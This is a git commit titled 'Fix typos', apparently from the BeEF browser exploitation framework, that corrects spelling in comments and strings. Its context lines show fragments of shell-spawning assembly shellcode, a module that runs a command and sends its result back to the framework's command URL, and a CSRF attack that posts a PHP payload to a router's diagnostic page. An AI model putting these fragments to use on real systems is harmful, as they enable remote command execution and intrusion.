Fix typos

This commit is contained in:
zinduolis
2025-11-10 20:39:51 +10:00
parent 582c4d67e3
commit cc862ae82f
20 changed files with 30 additions and 30 deletions

View File

@@ -165,7 +165,7 @@ search:
je found ;cmd= found
inc rbx
dec rcx
jrcxz notfound ;cmd= not in recieved buffer
jrcxz notfound ;cmd= not in received buffer
jmp search ;search some more
found:
xor rdi, rdi

View File

@@ -169,7 +169,7 @@ search:
je found ;cmd= found
inc ebx
dec ecx
jecxz notfound ;cmd= not in recieved buffer
jecxz notfound ;cmd= not in received buffer
jmp search ;search some more
found:

View File

@@ -26,7 +26,7 @@ shell:
pop ecx ; Set ECX for the loop
push_loop: ;
push esi ; push a null dword
loop push_loop ; keep looping untill we have pushed enough nulls
loop push_loop ; keep looping until we have pushed enough nulls
mov word [esp + 60], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
lea eax, [esp + 16] ; Set EAX as a pointer to our STARTUPINFO Structure
mov byte [eax], 68 ; Set the size of the STARTUPINFO Structure
@@ -34,8 +34,8 @@ push_loop: ;
push esp ; Push the pointer to the PROCESS_INFORMATION Structure
push eax ; Push the pointer to the STARTUPINFO Structure
push esi ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent
push esi ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent
push esi ; We dont specify any dwCreationFlags
push esi ; The lpEnvironment is NULL so the new process will have the same environment as its parent
push esi ; We don't specify any dwCreationFlags
inc esi ; Increment ESI to be one
push esi ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent
dec esi ; Decrement ESI back down to zero

View File

@@ -18,7 +18,7 @@ beef.execute(function() {
process.init(lFile);
process.run(false,['/c', command_str],2);
} catch (e) {
result = "an unexpected error occured";
result = "an unexpected error occurred";
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+result);

View File

@@ -57,7 +57,7 @@ function makeCSRF(token){
// Final CSRF attack with right referer (because executed in the context)
// and with right token captured above
var response = ajax('/diag_command.php', 'POST', 'txtCommand=&txtRecallBuffer=&dlPath=&ulfile=&txtPHPCommand=' + payload + '&submit=EXECPHP&__csrf_magic=' + token);
// Finally, redirect back to the intial hooked page
// Finally, redirect back to the initial hooked page
document.location=decodeURIComponent(redir);
}